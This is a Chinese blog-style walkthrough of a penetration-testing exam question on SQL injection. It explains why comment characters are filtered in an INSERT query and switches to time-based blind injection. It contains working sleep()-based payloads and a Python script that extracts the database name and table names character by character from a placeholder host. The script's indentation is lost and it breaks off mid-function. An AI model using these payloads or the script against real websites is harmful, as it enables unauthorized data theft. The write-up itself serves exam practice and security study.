周末帮好兄弟做PTE的真题,觉得确实挺有意思的,于是就有了这篇文章,侵删侵删哈
第一阶段
基础题目一:SQL注入
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
开始答题
这道题的有趣的地方就是,你先注册用户,不同于以往的360的PTE真题,并不是以admin用户去发表文章就能看到key,按照往常的先注册一个用户吧
可以看见,此时提示的代码显示过滤掉“#”、“–”注释符号,我们先正常写一篇文章试试
可以看见,这是一条插入语句,该插入方式的特点就是,插入的字段必须与表字段个数相同,多一个少一个都不行。我们看一下字段显示是否是2/3段
没戳,是2/3段位显示的位数,按照往常的只要能把后面的东西注释掉,然后把select语句或者直接利用报错注入插进去就行了,问题就是–、#都给注释了,那么此时应该如何利用呢?
笨人采用笨方法—SQL时间盲注解题
可以看见,页面确实是延迟了2秒,本来想用布尔盲注的,因为我发现条件为真的时候,文章显示为1为假的时候显示为2,一般能用布尔盲注尽量不用时间盲注,因为时间盲注一旦哪次访问出现异常,例如页面响应慢了,网络延迟了,都会影响测试的结果。但是由于文章不会直接显示在当前页面,所以只能用时间盲注,
用的poc:
笔者一开始进入误区,想复杂了,写了一个盲注脚本,利用时间盲注进行注入查询
' or if ((ascii (mid(database(), 1,1))=32),sleep(2),1) or '
' or (if(ascii(mid((select table_name from information_schema.tables where table_schema like 0x32776562 limit 0,1),1,1))=1,1,sleep(2))) or '
' or (if(ascii(mid((select column_name from information_schema.columns where table_schema like 0x32776562 and table_name like 0x61727469636C6531 limit 0,1),1,1))=1,sleep(2),1)) or '
' or (if(ascii(mid((select group_concat(content) from (select * from article1 limit 0,5) as temp),1,1))=1,sleep(2),1)) or '
时间盲注的话,老夫写出了一些还算能用的脚本,脚本如下
import requests
import time
?
def database_len():
length = 0
database = ''
for l in range(1, 8):
startTime1 = time.time()
url = "http://ip:81/start/post.php"
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded",
"Cookie": "PHPSESSID=ou3nrutcen0sh484fjfte8fvp3;",
"X-Forwarded-For": "127.0.0.1"
}
data = ("title=' or if (((length(database()))=%d),sleep(2),1) or '&content=" %(l))
#print(data)
response = requests.post(url, data=data, headers=header, verify=False, timeout=10)
#print(response.text)
if time.time() - startTime1 > 1:
length += l
print("the length :", str(length))
#database_len()
?
def database_name():
s = []
for i in range(1, 5):
for j in range(32,127):
startTime1 = time.time()
url = "http://ip?:81/start/post.php"
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded",
"Cookie": "PHPSESSID=ou3nrutcen0sh484fjfte8fvp3;",
"X-Forwarded-For": "127.0.0.1"
}
data = ("title=' or if ((ascii (mid(database(),%d,1))=%d),sleep(2),1) or '&content=" % (i,j))
#print(data)
response = requests.post(url, data=data, headers=header, verify=False, timeout=10)
if time.time() - startTime1 >= 1:
#print(j)
str = chr(int(j))
s.append(str)
break
print('database_name:', ''.join(s))
#database_name()
?
def table_name():
s = []
for i in range(0, 5):
for k in range (1, 10):
for j in range(32, 127):
startTime1 = time.time()
url = "http://ip?:81/start/post.php"
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded",
"Cookie": "PHPSESSID=ou3nrutcen0sh484fjfte8fvp3;",
"X-Forwarded-For": "127.0.0.1"
}
data = (
"title=' or (if(ascii(mid((select table_name from information_schema.tables where table_schema like 0x32776562 limit %d,1),%d,1))=%d,sleep(2),1)) or '&content=" % (
i,k,j))
print(data)
response = requests.post(url, data=data, headers=header, verify=False, timeout=10)
if time.time() - startTime1 >= 1:
# print(j)
str = chr(int(j))
s.append(str)
break